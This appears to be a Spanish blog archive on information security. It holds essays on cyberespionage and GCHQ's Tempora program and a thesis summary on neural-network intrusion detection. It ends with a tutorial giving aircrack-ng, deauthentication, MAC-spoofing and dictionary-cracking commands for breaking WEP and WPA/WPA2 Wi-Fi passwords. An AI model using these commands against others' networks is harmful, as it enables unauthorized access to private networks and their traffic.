Archivos de la categoría ‘SGSI’

Miércoles 14 de Agosto de 2013 en el Swissotel de San Isidro- Av. Via Central 150 en el horario de 8:00 a.m. a 6:00 p.m, 2do Congreso Congreso Cyber Security Bank Perú 2013

Anuncios

El ciberespionaje es el desastre más grande de la inteligencia desde la pérdida de los secretos nucleares a finales de la década de los 40, según comenta Jim Lewis del Centre for Strategic and International Studies, un think-tank con sede en Washington, DC, según cuenta The Economist. El siguiente paso tras penetrar en las redes para robar datos es disrupt o manipularlos. Si la información militar clave puede ser atacada, podrán ser inutilizados misiles balísticos. Los atacantes pueden preferir ir a por información de logística militar no clasificada o incluso infraestructuras civiles. Una pérdida de confidencialidad en transferencia electrónica de datos financieros puede producir desastres económicos. Un desastre podría ser un ataque a las redes eléctricas. Sin electricidad y otros servicios críticos, los sistemas de comunicaciones, los cajeros automáticos dejarían de funcionar. Una pérdida de energía durante unos pocos días, puede producir daños económicos en cascada impredecibles.

Los expertos no se ponen de acuerdo sobre las vulnerabilidades de los sistemas que funcionan en las plantas industriales conocidos como supervisory control and data acquisition (SCADA). Cada vez más estas infraestructuras se están conectando a Internet elevando el riesgo de ataques remotos y los programas SCADA de las redes se vuelven más vulnerables a los ciberataques.(1)

La OTAN ha sido consciente del riesgo de las ciberamenazas y creó un nuevo «concepto estratégico» que se adoptará a finales de este año (2). Para ello un panel de expertos liderado por Madeleine Albright, antigua Secretaria de Estado de Estados Unidos, realizó un informe en mayo de 2010 en el que consideraba que los ciberataques estaban entre las tres amenazas más probables a la Alianza. El siguiente ataque significativo bien puede ser la rotura de un cable de fibra óptica y puede ser lo bastante serio como para merecer una respuesta bajo las previsiones de defensa mutua contempladas en el artículo 5 (del Tratado de Washington). El General Alexander planteó la posible necesidad de la militarización del ciberespacio para proteger el derecho a la privacidad de los americanos. El Cibercomando protege solo al dominio militar «.mil». El domino de gobierno «.gov» y el de infraestructuras corporativas como los «.com» son responsabilidad respectivamente del Departamento de Homeland Security y de las empresas privadas con apoyo de Cybercom.

Las ciberarmas se pueden utilizar principalmente como adjuntas o complementarias
de las armas convencionales en el teatro de operaciones. El ciberataque se puede utilizar como un arma militar pero normalmente estará limitada en tiempo y efecto aunque si se utilizan como armas de espionaje el tiempo no importa y los resultados pueden esperar. La disuasión en la ciberguerra es más incierta que en el caso de la estrategia nuclear, ya que en este tipo de guerra no hay destrucción mutua asegurada y la línea divisoria entre la delincuencia y la guerra es borrosa y por ende, la identificación de los computadores atacantes y lógicamente, mucho menos, las pulsaciones de los dedos en los teclados, como atribución del posible delito. Economist concluye que las ciberarmas pueden ser más efectivas en manos de los grandes estados aunque también pueden ser de gran utilidad para los terroristas.

_____________________________________________________________________

(1) Sin duda el exhaustivo informe de The Economist era premonitorio y avisaba de los
riesgos de los sistemas SCADA, como así fue en los ataques sufridos a finales de
septiembre, por el virus Stuxnet, especialmente en Irán.
(2) La OTAN en la Cumbre de Lisboa celebrada el 20 de noviembre de 2010 aprobó la
estrategia de ciberseguridad.

La defensa del nuevo dominio. La ciberestrategia del Pentágono

Apoyándose en las estrategias marcadas al principio del mandato del Presidente Obama entre el año 2009 y 2010, William J. Lynn III (1), U. S,Deputy Secretary of Defensa, ha publicado un artículo en la prestigiosa revista Foreign Affairs, donde expone los cinco principios básicos de laestrategia de la guerra del futuro…

Derivado del escándalo PRISM y de las mismas fuentes que lo destaparon, el diario The Guardian asegura que la agencia de inteligencia británica GCHQ tiene monitorizadas las mayores redes troncales de fibra óptica por las que circulan la mayoría del tráfico telefónico y de Internet mundial.

La operación de ciberespionaje británico, con nombre en código ‘Tempora’, incluye interceptores en los cables submarinos trasatlánticos bajo conocimiento y acuerdo con las empresas comerciales que construyen y operan los claves.

Según las fuentes, el alcance de Tempora es gigantesco, incluso mayor que el de la operación de vigilancia electrónica masiva llevada a cabo por la NSA estadounidense (aunque comparten información) bajo PRISM y que ha salpicado a las grandes tecnológicas del país como Google, Apple o Microsoft.

La cantidad de información a la que tendría acceso Tempora sería enorme ya que tendría monitorizado 200 cables de fibra por los que pasan 10 gigabits de datos por segundo.

Unas 850.000 empleados y contratistas públicos y privados tendrían acceso a esta enorme base de datos, aunque los informes de alto secreto serían de 750 analistas de GCHQ y NSA que trabajan específicamente en el filtrado de información entre llamadas, correo electrónico, documentos, redes sociales y todo lo que se mueva en Internet.

La información, con todos los indicios de ser cierta al igual que PRISM, reaviva el debate de hasta dónde debe alcanzar el ciberespionaje en aras de la seguridad y si es lícito una vigilancia generalizada y sin control de todas las redes de telecomunicaciones y de Internet, en un grave atentado a la privacidad de los ciudadanos.

Ironías del destino, Edward Snowden, filtrador de la información, acaba de ser acusado formalmente de espionaje por el gobierno de Estados Unidos.

fuente:http://muyseguridad.net/2013/06/22/espias-britanicos-comunicaciones/

El Diccionario de la Real Academia Española (DRAE) en su 22ª edición define Ciberespacio, única acepción, como el «Ámbito artificial creado por medios informáticos». En realidad, entendemos que la RAE se está refiriendo a un entorno no físico creado por un equipo informático con el objetivo de interoperar en una Red. El mayor ámbito del ciberespacio es Internet. El término fue utilizado por primera vez en la obra Neuromante del escritor norteamericano William Gibson y publicada en el emblemático 1984 que presagia Orwell. También podríamos definir el ciberespacio desde su perspectiva original como un conjunto o realidad virtual donde se agrupan usuarios, páginas web, chat y demás servicios de Internet además de otras redes. Otro nombre influyente en la definición e historia posterior del ciberespacio es John Perry Barlow, autor del famoso Manifiesto «La declaración del Ciberespacio» que se convirtió desde su aparición en referencia obligada al tratar el término y su impacto social. Barlow, declaraba el ciberespacio entre diferentes acepciones: «Alucinación sensual», «Espacio virtual de interacción» o «el nuevo hogar de la Mente». Sin embargo, la definición más sencilla y práctica dada en los nacimientos del concepto es «Un espacio virtual de interacción» o de un modo simple: «Aquel espacio donde sucede una conversación telefónica ». Hoy podríamos extender esta definición a: «El espacio donde se navega por Internet, se realizan conversaciones por Skype o en las redes sociales, o estamos cuando consultamos el correo electrónico, chateamos o visitamos un periódico digital». Existen numerosas definiciones de ciberespacio. Desde la más simple y ya vieja e histórica «es aquel espacio donde sucede una conversación telefónica», hasta una más práctica y actual «El espacio o realidad virtual donde se agrupan usuarios, páginas web, chat, redes sociales, blogs,… y demás servicios de la Web y de Internet». En cualquier caso y relativo al tema central de esta obra, «el ciberespacio es el nuevo campo donde pasamos gran parte de nuestras vidas los más de 1.000 millones de habitantes que hoy día tenemos acceso a Internet»; este campo, es un gran campo social donde disfrutar, trabajar, pensar, vivir,…, pero también es un nuevo campo de batalla, debido a los riesgos y amenazas que su uso masivo plantea. El ciberespacio fue declarado por The Economist (19) como el quinto dominio después de la tierra, el mar, el aire y el espacio. El presidente de Estados Unidos, Barack Obama, ha declarado que la infraestructura digital de América debe ser declarada «un activo nacional estratégico» y para conseguir ese objetivo nombró a Howard Schmidt, antiguo director de seguridad de Microsoft, como su zar de la ciberseguridad. En mayo de 2010 el Pentágono estableció su nuevo Cyber Command (Cybercom) nombró director del mismo al general Keith Alexander, director de la National Security Agency (NSA), habiendo quedado activado Cybercom en el pasado mes de octubre. Su mandato le obliga a conducir las operaciones de un amplio espectro para defender las redes militares estadounidenses y dirigir y realizar los ataques que fueran necesarios contra otros países.Imagen

El imparable crecimiento de internet en el mundo, y la integración de los diversos sistemas informáticos conectados a la red de Internet han hecho que la Seguridad de la Información alcance un papel de suma importancia actualmente. Desde el momento en que un equipo (bien un ordenador, una tableta o un “smartphone”) se conecta a Internet, se abren toda una serie de posibilidades; sin embargo, éstas traen consigo nuevos y en ocasiones complejos tipos de ataques. Para que  las informaciones sean protegidas de acciones maliciosas, es necesario hacer uso de herramientas especializadas en la protección de datos e informaciones, como antivirus, antispam, firewall, IDS, IPS, balanceadores de cargas, control de accesos, sistemas criptográficos tipos VPN y entre otras. Un sistema que auxilia y automatiza la protección de las informaciones es el sistema de detección de intrusos (IDS) que  tiene como intensión de detectar el uso no autorizado, ataques en ordenadores o en redes de ordenadores. Sin embargo, algunas funcionalidades de esos sistemas son limitadas, tales como la detección, el análisis y la respuesta instantánea de un nuevo ataque (Zero day attack).
La aplicación de técnicas basadas en Inteligencia Artificial para la detección de intrusos (IDS) fundamentalmente las redes neuronales artificiales (ANN), están demostrando ser un enfoque muy adecuado para paliar muchos de los problemas que se dan en esta área. Sin embargo, gran volumen de información que se requiere cada día para entrenar estos sistemas, junto con la necesidad exponencial de tiempo que requieren para asimilarlos, dificulta enormemente su puesta en marcha en escenarios reales.
Ante esta situación me propuse diseñar un sistema capaz de detectar situaciones anómalas en la red, basado en modelos de inteligencia computacional e instrumento complementario para visualizar la estructura interior de un conjunto de datos asociados al tráfico de redes, se aplicarán diversas técnicas EPP (Exploratory Proyection Pursuit) como PCA (Principal Component Analysis), MLHL (Maximum Likelihood Hebbian Learning) y CMLH (Cooperative Maximum Likelihood Hebian Learning), para analizar la estructura interna del conjunto de datos y de este modo identificar comportamiento anómalos asociados a situaciones de riesgo en la red (CORCHADO, HERRERO, 2013).
 
       Una vez definida la propuesta: “modelos de inteligencia computacional aplicados al diseño e investigación de sistema de detección de intrusos”; procedí a la realización de la fase de experimentación y de análisis de los resultados, por tal motivo me centré en la fase de análisis, debido a que la mencionada experimentación está igualmente orientada hacia dicha cuestión. Para las mencionadas pruebas, el autor en lo posible ha tratado de considerar un escenario real donde nuestro análisis no sólo se centrará en conocidos puertos, protocolos, direcciones IPV4, etc. sino que analizaremos todo el tráfico de datos generados por la red (los datos capturados fueron de 6 semanas llegando acumular un aproximado de 600 gb de tráfico de red), en donde se han hecho un sin número de pruebas de ataques tanto internos como externos suplantando inclusive algunas IP de los equipos de la red (señuelos), pero el mayor énfasis de estas pruebas cayó en los ataques internos (localmente) en vista que con las pruebas realizadas hemos podido ver que muchos de estos ataques son más difíciles de detectar y se confunden dentro del tráfico normal de la red lo cual muchas veces pasan desapercibidas por el administrador de redes. En la séptima edición del informe anual de seguridad en entidades financieras realizado por Deloitte[84], en la que han participado más de 350 entidades financieras de todo el mundo, 19 de ellas españolas y que analiza el estado de estas compañías en materia de seguridad de la información; concluyen que los “ataques internos” y “las “fugas de información” son, por tanto los problemas más detectados en las entidades. Las proyecciones de PCA, MLHL y en especial la de CMLHL permiten identificar situaciones anómalas, muchas de estas situaciones dependiendo de dónde proceda el ataque tendrán una particularidad que se diferenciará al del tráfico normal pudiendo ser la concentración de paquetes, direcciones no paralelas, el distanciamiento que tienen con el conjunto de paquetes y muchas más particularidades que se reflejaron en la experimentación y análisis nos dan indicios de situaciones anómalas, lo cual nos permite su identificación.
          En la Figura 1.1 se puede apreciar el scatter plot generado por la PCA, enfrentando las m (número de neuronas de salida) primeras componentes (columnas) del conjunto de datos entre sí. Dicha visualización representa el tráfico normal de la red por un tiempo de 10 minutos.
Figura 1.1 Scatter Plot, del tráfico normal.
 

            En la Figura 1.2  apreciamos el tráfico normal de la red en 3 dimensiones.

Figura 1.2 Tráfico normal de la red en 3D.
 
      En la Figura 1.3 apreciamos la proyección PCA en 2 dimensiones, del segmento simple(S1) conteniendo situaciones no anómalas (tráfico normal de la red)
Figura 1.3 Visualización del Segmento  simple-S1.(PCA)
 
 
 
 
A continuación visualizaremos el segmento simple (S9), en total tienen una duración de 10 minutos aproximadamente, donde el tipo de ataque fue una denegación de servicio que consistió en la inundación de paquetes UDP flags por un tiempo de sólo 8 segundos. Apreciaremos la proyección 2D del  PCA, MLHL y CMLHL respectivamente. El tamaño de los paquetes, que son diferenciados con el color magenta (S9) del tráfico normal; vemos que toman un direccionamiento  continuo contrario al del tráfico normal y es debido a que dicho ataque es del tipo spoofing en la cual la identidad del atacante es suplantada por un sin número de direcciones IPs (direcciones no locales).
Figura 1.4  Visualización del Segmento simple-S9. (PCA)
 Figura 1.5  Visualización del Segmento simple-S9. (MLHL)
 
 
Figura 1.6  Visualización del Segmento simple-S9. (CMLHL)
         De todos los experimentos presentados anteriormente, se ha podido ver que los ataques realizados localmente muchas veces se confunden con el del tráfico normal, pero la dirección,  la dimensión y la localización de los paquetes las distinguen de lo normal. Así mismo aquellos ataques realizados desde el exterior de nuestra red son representados como líneas no paralelas a la dirección en la cual el tráfico normal se desarrolla. Por lo tanto no es fácil el establecer exactamente que ocurre en un momento dado; es en este preciso instante donde el análisis cumple un papel sumamente importante por tal motivo nos apoyamos en uno de los paradigmas del presente estudio, que es el estudio de casos (CBR), donde el análisis incorpora dos comportamientos diferentes que son: “aprendiendo” y la “explotación”.
      Los resultados del estudio de pruebas demuestran la capacidad de  generalización, porque muestra “el modelo visual” de ataques nuevos incluso si el modelo neuronal no ha afrontado tales ataques antes. Debería ser notado que los atacantes emplean estrategias muy diferentes para poder pasar inadvertidos en la red haciendo uso de diversas técnicas como: la extensión de los paquetes de ataque con el tiempo o reduciendo la cantidad de paquetes en un ataque, el empleo de señuelos, etc; harán que  se visualicen menos claramente dichos ataques, pero con el empleo del CMLHL se pueden identificar dichos ataques con mayor efectividad como ha sido mostrado en las figuras anteriormente mostradas.
         Comparando CMLHL con otros  modelos no supervisados, podemos concluir que PCA y MLHL en la identificación de situaciones anómalas son menos eficientes y eficaces. Por tal motivo CMLHL será el modelo a ser utilizado para próximos proyectos de investigación relacionados al campo de ID. Próximamente en: http://peromatech.com, https://peromatech.wordpress.com
referencias:
[1] CORCHADO, Emilio; HERRERO, Álvaro. RT-MOVICAB-IDS: Addressing real-time intrusion detection. Spain, 2013. University of Salamanca.
[2] Proyecto de tesis :Modelos de inteligencia computacional aplicados al diseño e investigación de detección de intrusos, Autor: Arthur Huamani Cuba, Bilbao -España
Wauuu lo que puede hacer un simple Script , volver loca a una mujer! .Una vez más demostrado que un informático también tiene su corazoncillo y que es un buen conquistador!!! :p.
 
Bueno volviendo al mundo malévolo y dejando la cursileria de lado , les presentaré un resumen de como atacar una Wireless con seguridad WEP y WPA/WPA2/PSK.
 
” A continuación se ponen en conocimiento de los artículos del Código Penal del Reino de España que existe la posibilidad de que sean vulnerados si se diese un uso usofraudulento de las comunicaciones inalámbricas. El autor no se hace responsable del uso de los conocimientos adquiridos o aquí descritos. “
 
Conociendo las normas legales continuaremos…
 
Para esto a manera de concepto existen diversos tipos de ataques sobre una Wi-Fi :
 
*Eavesdropping
*Defraudación de comunicaciones
*Hijacking
*Man in the Middle.
*Denial of Service & Distributed  D.O.S
*Spam/ Span over Voice over IP (SPIT)
*Ejecución remota de código arbitrario.
 
Empezando con algunos comandos en Linux :
Viendo dispositivo inalámbrico y activandolo.
      ifconfig
      ifconfigwlan0 up
Listando redes inalámbricasdisponibles.
      iwlist wlan0 scan
Conectandose a una red Wirless
      iwconfig wlan0 essidWifiDestroyer
OpteniendodireccionIP.
      dhclient3 wlan0
 
Instalación en Linux de herramientas Wireless:
Normalmente viene  instalado pero si no hay que instalarlo manualmente.
Paquete “wireless-tool”.
  sudo apt-get install wireless-tools
Comprobar chipset
  lspci | grep Network
  lsusb | grep Wireless
•  Instalación de Suite Aircrack-ng
  sudo apt-get install aircrack-ng  
Airmon-ng: cambio de modo de NIC.
EJEMPLOS BÁSICOS:
•To start wlan0 in monitor mode:
  airmon-ng start wlan0
•To start wlan0 in monitor mode on channel 8:
  airmon-ng start wlan0 8
•To stop wlan0:
  airmon-ng stop wlan0
•To check the status:
  airmon-ng
 
Cambio de la MAC pasos:
#airmon-ng                          //viendo la interfaz que usamos
#airmon-ng stop  wlan0        //detenemos el modo monitor
#ifconfig  wlan0   down         //tiramos nuestra interface
#macchanger –mac 02:11:22:33:4B:5A wlan0     //cambiando la mac a 02:11:22:33:4B:5A
#airmon-ng start wlan0         //iniciamos el modo monitor nuevamente.
 
Nota:existen un sin numero de herramientas que practicamente automatizan el cambio de la 
MAC :
MAC AddressChanger: (Windows)
TechnitiumMAC AddressChanger: (Windows) 
   http://www.technitium.com/tmac/index.html
A)Buscando Redes empezando ATAQUE WEP:
#airodump-ng wlan0            //escaneando redes, para detener : Ctrl + C 
#airodump-ng -c 1 -w underc0de –bssid 4A:2C:56:33:76:5E wlan0  //canal : 3, capturamos 
 datas [no cerrar terminal]
 
Asociándonos a la Red (abrimos otro terminal)
#aireplay-ng -1 0 -a  4A:2C:56:33:76:5E -h 02:11:22:33:4B:5A -e WifiDestroyer wlan0  
Si nos aparece algun tipo de error puede ser por lo siguiente:
-La red a la que quieres atacar está muy lejos.
-Tu tarjeta de red no puede hacer inyección de paquetes.
-el router tiene seguridad para evitar este tipo de ataques.
 
Inyectando tráfico (en el terminal anterior)
#aireplay-ng -3 -b  4A:2C:56:33:76:5E -h 02:11:22:33:4B:5A wlan0  
 
Desencriptando el password (abrimos un tercer terminal )
#aircrack-ng underc0de-01.cap  
Con esto al termino del desencriptado nos mostrara el password.
 
B) ATAQUE WPA/WPA2/PSK:
Colocamos  nuestra interfaz en modo monitor de la misma forma que en el caso del Ataque 
WEP.
Capturando el HANDSHAKE
#airodump-ng mon0  //escaneando redes, para detener : Ctrl + C 
#airodump-ng mon0 –channel 1 –bssid 4A:2C:56:33:76:5E -w /tmp/wpa2  //nos aparece una 
imagen de la red de clientes conectados
Abrimos otro terminal y en el colocamos lo siguiente:
#aireplay-ng -0 1 -a 4A:2C:56:33:76:5E -c 70:F1:A2:95:T4:5D mon0    // 70:F1:A2:95:T4:5D : 
MAC del cliente
Ejecutado el comando, en el terminal anterior aparecerá en la parte superior derecho el 
Handshake.
Por ultimo desencriptaremos el password pudiendo hacerse de dos formas con :
*Fuerza Bruta con el John the Ripper.
*Por medio de Diccionario.
Obteniendo el Password
Utilizando el diccionario 
#aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b 4A:2C:56:33:76:5E /tmp/wpa2*.cap
 
Utilizando el john the ripper
# /pentest/passwords/jtr/john –stdout –incremental:all | aircrack-ng -b 4A:2C:56:33:76:5E -w – 
/tmp/wpa2*.cap
Ahora sólo nos queda esperar en vista que el tiempo es proporcional a la dificultad del 
password.
 
Existe una herramienta que también es muy recomendable por su automatización y por el 
tiempo que nos ahorrará ,siendo muy usada en las auditorias.
WIFITE es una herramienta que esta desarrollada en Python y que nos permitirá realizar 
ataque WEP y WAP al mismo tiempo, para esto lo descargamos :
#chmod +x wifite.py
ejecutamos la aplicación
#./wifite.py
Lo que viene a continuación es sólo seguir la instrucción del programa que prácticamente 
trabajará al punto que nos brindara directamente el password de la red atacada.
 
David Hulton, permite alquilar en su web alquilar por pocos dólares, clustersde tarjetas 
FPGAS para crackearWPA.   https://www.cloudcracker.com/
 
Si se dispone de tarjetas gráficas compatibles, se pueden utilizar herramientas que son 
capaces de procesar el ataque en los núcleos de las propias GPUs. Por ejemplo, con 
ElcomsoftWireless Security Auditor (Windows).   http://www.elcomsoft.es
 
En Linux, se puede usar Pyrit. Este programa permite crear Bases de datos masivas de 
hashes precalculados de passwords. Para ello hace uso de los multiples cores de una 
maquina y de algunas tarjetas graficas como ATI-Stream, Nvidia CUDA and OpenCL. 
Es el ataque más potente que se puede hacer actualmente para ataques de fuerza 
bruta.
 
Comandos: pyrit -r captura_WPA_Wifilabs.pcap-01.cap -i dict.txt -b 1c:7e:e5:fd:08:f8 
attack_passthrough
  -r à fichero de captura de Handshake
  -i à Dicccionario
  – b à BSSID de la red
  attack_passthrough